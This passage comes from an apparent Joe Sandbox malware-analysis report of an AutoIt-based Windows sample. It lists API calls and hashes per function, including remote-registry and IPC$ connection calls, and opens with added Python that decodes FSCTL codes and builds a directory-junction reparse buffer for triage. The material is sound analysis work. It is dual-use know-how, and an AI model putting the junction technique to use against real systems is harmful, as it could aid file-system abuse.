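                                                       The function listed above (GetFullPathNameW, CreateDirectoryW, CreateFileW, RemoveDirectoryW, DeviceIoControl, CloseHandle, string "\??\%s") passes several raw constants that the report prints but does not name. The Python below is an added worked example, not code from the Joe Sandbox report, from the sample, or from AutoIt: it decodes the DeviceIoControl control code 000900A4 with the Windows CTL_CODE layout (which yields FSCTL_SET_REPARSE_POINT), names the CreateFileW arguments 40000000 / 00000003 / 02200000 (GENERIC_WRITE, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT), and builds and parses the mount-point REPARSE_DATA_BUFFER that FSCTL_SET_REPARSE_POINT takes, using the NT "\??\" prefix for the substitute name. Reading the routine as a directory-junction creator is an inference from those constants and the format string, not something the report states; the target path used in the example is constructed.

```python
import struct
from typing import Dict, List, Tuple

# --- CTL_CODE decoding (winioctl.h) ------------------------------------------
# CTL_CODE(DeviceType, Function, Method, Access)
#     = (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
DEVICE_TYPES = {0x09: "FILE_DEVICE_FILE_SYSTEM"}                    # partial table
METHODS = ["METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER"]
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS"}
FSCTL_FUNCTIONS = {41: "FSCTL_SET_REPARSE_POINT",                  # reparse-point family only
                   42: "FSCTL_GET_REPARSE_POINT",
                   43: "FSCTL_DELETE_REPARSE_POINT"}


def decode_ctl_code(code: int) -> Tuple[str, int, str, str, str]:
    """Return (device, function, method, access, symbolic name) for an IOCTL/FSCTL code."""
    device, access = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    name = FSCTL_FUNCTIONS.get(function, "?") if device == 0x09 else "?"
    return (DEVICE_TYPES.get(device, hex(device)), function, METHODS[method],
            ACCESS.get(access, str(access)), name)


# --- CreateFileW argument decoding -------------------------------------------
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
CREATEFILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",     # required to open a directory handle
                    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT"}   # operate on the link itself, not its target


def decode_createfile(access: int, disposition: int, flags: int) -> Dict[str, List[str]]:
    """Name the bits of the dwDesiredAccess, dwCreationDisposition and dwFlagsAndAttributes
    arguments as they appear in the disassembly listing."""
    return {
        "access": [n for bit, n in GENERIC_ACCESS.items() if access & bit],
        "disposition": [DISPOSITIONS.get(disposition, str(disposition))],
        "flags": [n for bit, n in CREATEFILE_FLAGS.items() if flags & bit],
    }


# --- REPARSE_DATA_BUFFER for a mount point (directory junction) -------------
IO_REPARSE_TAG_MOUNT_POINT = 0xA0000003


def build_mount_point_buffer(target: str) -> bytes:
    """Input buffer FSCTL_SET_REPARSE_POINT expects for a junction pointing at `target`.
    The substitute name carries the NT "\\??\\" prefix (cf. the "\\??\\%s" string in the
    function's string list); the print name is the plain Win32 path."""
    substitute = ("\\??\\" + target).encode("utf-16-le")
    print_name = target.encode("utf-16-le")
    path_buffer = substitute + b"\x00\x00" + print_name + b"\x00\x00"
    # MountPointReparseBuffer header: SubstituteNameOffset/Length, PrintNameOffset/Length (bytes)
    header = struct.pack("<HHHH", 0, len(substitute), len(substitute) + 2, len(print_name))
    data = header + path_buffer
    # Outer header: ReparseTag, ReparseDataLength, Reserved
    return struct.pack("<IHH", IO_REPARSE_TAG_MOUNT_POINT, len(data), 0) + data


def parse_mount_point_buffer(buf: bytes) -> Tuple[str, str]:
    """Inverse of build_mount_point_buffer: returns (substitute name, print name)."""
    tag, data_len, _ = struct.unpack_from("<IHH", buf, 0)
    if tag != IO_REPARSE_TAG_MOUNT_POINT:
        raise ValueError(f"not a mount point reparse tag: {tag:#x}")
    sub_off, sub_len, prt_off, prt_len = struct.unpack_from("<HHHH", buf, 8)
    path = buf[16:8 + data_len]
    return (path[sub_off:sub_off + sub_len].decode("utf-16-le"),
            path[prt_off:prt_off + prt_len].decode("utf-16-le"))


if __name__ == "__main__":
    # Values taken from the CreateFileW / DeviceIoControl lines of the listing above.
    print(decode_ctl_code(0x000900A4))
    print(decode_createfile(0x40000000, 3, 0x02200000))
    buf = build_mount_point_buffer("C:\\Windows\\Temp")   # constructed target path
    print(parse_mount_point_buffer(buf))
```

The decoded flags are the detail worth keeping in a triage note: a handle opened with FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT and then fed to FSCTL_SET_REPARSE_POINT is the canonical way to turn a freshly created directory into a junction, which is why CreateDirectoryW precedes CreateFileW in the call list and RemoveDirectoryW sits on the failure path.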
                                                      APIs
                                                      • timeGetTime.WINMM ref: 00E9E6B4
                                                        • Part of subcall function 00E4E551: timeGetTime.WINMM(?,?,00E9E6D4), ref: 00E4E555
                                                      • Sleep.KERNEL32(0000000A), ref: 00E9E6E1
                                                      • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00E9E705
                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00E9E727
                                                      • SetActiveWindow.USER32 ref: 00E9E746
                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00E9E754
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00E9E773
                                                      • Sleep.KERNEL32(000000FA), ref: 00E9E77E
                                                      • IsWindow.USER32 ref: 00E9E78A
                                                      • EndDialog.USER32(00000000), ref: 00E9E79B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                      • String ID: BUTTON
                                                      • API String ID: 1194449130-3405671355
                                                      • Opcode ID: 6481c794484eedf60e6b49a835e1f4657cc67ea3d731f667f93ddc49d92eb5e1
                                                      • Instruction ID: 21a4f093915a2657a4c158028945ae40c475f9bb2bb4c008aac5d6668581f0cf
                                                      • Opcode Fuzzy Hash: 6481c794484eedf60e6b49a835e1f4657cc67ea3d731f667f93ddc49d92eb5e1
                                                      • Instruction Fuzzy Hash: B72151B0200209BFEF009F61ED8DE253B69F75474DB242435FA19B16A1DB73AC45AB25
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00E9EA5D
                                                      • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00E9EA73
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E9EA84
                                                      • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00E9EA96
                                                      • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00E9EAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: SendString$_wcslen
                                                      • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                      • API String ID: 2420728520-1007645807
                                                      • Opcode ID: 7771324fd0a984760ff284a98b11ede7a7bac304628db8fd212f8a51be434fdd
                                                      • Instruction ID: c158b1506bc718ad4045d0d8d086dfe213d4f61d644da97fb990740e9119d5fe
                                                      • Opcode Fuzzy Hash: 7771324fd0a984760ff284a98b11ede7a7bac304628db8fd212f8a51be434fdd
                                                      • Instruction Fuzzy Hash: 13115131A9025D7ADB20E7A2DC4AEFF6BBCEBD1B04F406429B511B20D1EAF05905C6B0
                                                      APIs
                                                      • GetDlgItem.USER32(?,00000001), ref: 00E95CE2
                                                      • GetWindowRect.USER32(00000000,?), ref: 00E95CFB
                                                      • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00E95D59
                                                      • GetDlgItem.USER32(?,00000002), ref: 00E95D69
                                                      • GetWindowRect.USER32(00000000,?), ref: 00E95D7B
                                                      • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00E95DCF
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00E95DDD
                                                      • GetWindowRect.USER32(00000000,?), ref: 00E95DEF
                                                      • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00E95E31
                                                      • GetDlgItem.USER32(?,000003EA), ref: 00E95E44
                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E95E5A
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E95E67
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                      • String ID:
                                                      • API String ID: 3096461208-0
                                                      • Opcode ID: 7adaddc032b5fc15e64b97e11009fb72eab1ceb340418517ac5d871a068e3aa1
                                                      • Instruction ID: c165b9da099cc1f31b8da638bd043393153f2acd145270cde9cda3b400f48177
                                                      • Opcode Fuzzy Hash: 7adaddc032b5fc15e64b97e11009fb72eab1ceb340418517ac5d871a068e3aa1
                                                      • Instruction Fuzzy Hash: DA511CB1A00605AFDF18CF69CD89EAEBBB5EB48700F209129F919F6290D7719E05CB50
                                                      APIs
                                                        • Part of subcall function 00E48F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E48BE8,?,00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E48FC5
                                                      • DestroyWindow.USER32(?), ref: 00E48C81
                                                      • KillTimer.USER32(00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E48D1B
                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00E86973
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E869A1
                                                      • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E48BBA,00000000,?), ref: 00E869B8
                                                      • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E48BBA,00000000), ref: 00E869D4
                                                      • DeleteObject.GDI32(00000000), ref: 00E869E6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                      • String ID:
                                                      • API String ID: 641708696-0
                                                      • Opcode ID: 75d2c05e9f11c865515a5375af9d909154eec39e860d037f2925a518f53c5a94
                                                      • Instruction ID: 08516c06bf31c5139fc7849763d56b49c8cb90b3ef30b14749785dbd2a72808b
                                                      • Opcode Fuzzy Hash: 75d2c05e9f11c865515a5375af9d909154eec39e860d037f2925a518f53c5a94
                                                      • Instruction Fuzzy Hash: 7561CE30502714DFDB259F15EA88B29B7F1FB4031AF10652DE04ABB5A0CB31AD85DF91
                                                      APIs
                                                        • Part of subcall function 00E49944: GetWindowLongW.USER32(?,000000EB), ref: 00E49952
                                                      • GetSysColor.USER32(0000000F), ref: 00E49862
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ColorLongWindow
                                                      • String ID:
                                                      • API String ID: 259745315-0
                                                      • Opcode ID: 669bbf60b9bfe15c5991578ec13d6b6cd11bd6d2ce2bd169e90c3781a0dc28f6
                                                      • Instruction ID: e85447308351a390839f63ac436ec3fadb6ac13834be34d5990e09fa5a14c11f
                                                      • Opcode Fuzzy Hash: 669bbf60b9bfe15c5991578ec13d6b6cd11bd6d2ce2bd169e90c3781a0dc28f6
                                                      • Instruction Fuzzy Hash: 7541A5311056449FDB245F3DAC44FBA3B65AB4A334F285615FAAAB71E2C7319C42DB10
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .
                                                      • API String ID: 0-3963672497
                                                      • Opcode ID: f5b28752ad84b801b90e0ef6847c3dc6e0d63acafa7cc239579aed9923612c32
                                                      • Instruction ID: a26a3266e46a388cc04d9181954d4205c224c68a36c3cde65990e9811381da8f
                                                      • Opcode Fuzzy Hash: f5b28752ad84b801b90e0ef6847c3dc6e0d63acafa7cc239579aed9923612c32
                                                      • Instruction Fuzzy Hash: 9DC10274A44249AFCF11DFA8E840BADBBF5BF49390F186199F915B7392CB308941CB60
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00E7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00E99717
                                                      • LoadStringW.USER32(00000000,?,00E7F7F8,00000001), ref: 00E99720
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00E7F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00E99742
                                                      • LoadStringW.USER32(00000000,?,00E7F7F8,00000001), ref: 00E99745
                                                      • MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00E99866
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wcslen
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 747408836-2268648507
                                                      • Opcode ID: 144a2094f11870aba2f9ecf698c19d0bbff6d81ea0582ce837ae7c3f093f794d
                                                      • Instruction ID: 2e1267e47da1ca59be7466cfbeb26e5d47e098539b23c965385485e104bd8eca
                                                      • Opcode Fuzzy Hash: 144a2094f11870aba2f9ecf698c19d0bbff6d81ea0582ce837ae7c3f093f794d
                                                      • Instruction Fuzzy Hash: 5A414172800209ABCF14FBE4DD4ADEEB7B8AF55340F206069F60572092EB755F49CB61
                                                      APIs
                                                        • Part of subcall function 00E36B57: _wcslen.LIBCMT ref: 00E36B6A
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00E907A2
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00E907BE
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00E907DA
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00E90804
                                                      • CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00E9082C
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E90837
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00E9083C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 323675364-22481851
                                                      • Opcode ID: 5a3a9469b94d6b58f5b708c46806e2b41751fb4e8abba2e7a2a5120eb2f46965
                                                      • Instruction ID: b2898536d03a1b64ac3be8ea6212d0c61f4c60f257f15026dc359a23f981f9e3
                                                      • Opcode Fuzzy Hash: 5a3a9469b94d6b58f5b708c46806e2b41751fb4e8abba2e7a2a5120eb2f46965
                                                      • Instruction Fuzzy Hash: EF411772C10229AFCF25EBA4DC89CEDBBB8BF44350F545129E915B3161EB709E44CBA0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00EB3C5C
                                                      • CoInitialize.OLE32(00000000), ref: 00EB3C8A
                                                      • CoUninitialize.OLE32 ref: 00EB3C94
                                                      • _wcslen.LIBCMT ref: 00EB3D2D
                                                      • GetRunningObjectTable.OLE32(00000000,?), ref: 00EB3DB1
                                                      • SetErrorMode.KERNEL32(00000001,00000029), ref: 00EB3ED5
                                                      • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00EB3F0E
                                                      • CoGetObject.OLE32(?,00000000,00ECFB98,?), ref: 00EB3F2D
                                                      • SetErrorMode.KERNEL32(00000000), ref: 00EB3F40
                                                      • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00EB3FC4
                                                      • VariantClear.OLEAUT32(?), ref: 00EB3FD8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                                      • String ID:
                                                      • API String ID: 429561992-0
                                                      • Opcode ID: 2036cc201609a5d35388da905be3670dc88567e7c4715358244833fdc655386a
                                                      • Instruction ID: b1fa1e492a66598e3a9fc8f4fa19311d41ae8952ffc94c97e62067052126c32e
                                                      • Opcode Fuzzy Hash: 2036cc201609a5d35388da905be3670dc88567e7c4715358244833fdc655386a
                                                      • Instruction Fuzzy Hash: 71C169716083019FC700DF68C8859ABBBE9FF89748F10591DF989AB251DB31ED06CB52
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00EA7AF3
                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EA7B8F
                                                      • SHGetDesktopFolder.SHELL32(?), ref: 00EA7BA3
                                                      • CoCreateInstance.OLE32(00ECFD08,00000000,00000001,00EF6E6C,?), ref: 00EA7BEF
                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EA7C74
                                                      • CoTaskMemFree.OLE32(?,?), ref: 00EA7CCC
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00EA7D57
                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EA7D7A
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00EA7D81
                                                      • CoTaskMemFree.OLE32(00000000), ref: 00EA7DD6
                                                      • CoUninitialize.OLE32 ref: 00EA7DDC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                      • String ID:
                                                      • API String ID: 2762341140-0
                                                      • Opcode ID: 65cf0f38b89ab50d9100eee00bd114d4f4d7c4e351f26151e77337b7e990939e
                                                      • Instruction ID: 522dc9c672fa1f0a66530bc5485c73599e661e5d892cd2beed2090c5c8e1cc5b
                                                      • Opcode Fuzzy Hash: 65cf0f38b89ab50d9100eee00bd114d4f4d7c4e351f26151e77337b7e990939e
                                                      • Instruction Fuzzy Hash: 32C13B75A04109AFCB14DF64C888DAEBBF9FF49304F1494A8E45AEB261C731ED46CB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EC5504
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC5515
                                                      • CharNextW.USER32(00000158), ref: 00EC5544
                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EC5585
                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EC559B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC55AC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CharNext
                                                      • String ID:
                                                      • API String ID: 1350042424-0
                                                      • Opcode ID: 5023f2d70e08f9888d67ef71474f915073e4976dd129bd42c7a34f5403f2c8c9
                                                      • Instruction ID: 4e674e28c349409561426675fc7469d6cce725f9e627adc4e0064991ed6964e8
                                                      • Opcode Fuzzy Hash: 5023f2d70e08f9888d67ef71474f915073e4976dd129bd42c7a34f5403f2c8c9
                                                      • Instruction Fuzzy Hash: 3B618B32900608EFDF108F54CE84EFE7BB9FB09724F105159F925B6290D772AA82DB61
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E8FAAF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00E8FB08
                                                      • VariantInit.OLEAUT32(?), ref: 00E8FB1A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E8FB3A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00E8FB8D
                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E8FBA1
                                                      • VariantClear.OLEAUT32(?), ref: 00E8FBB6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00E8FBC3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8FBCC
                                                      • VariantClear.OLEAUT32(?), ref: 00E8FBDE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8FBE9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
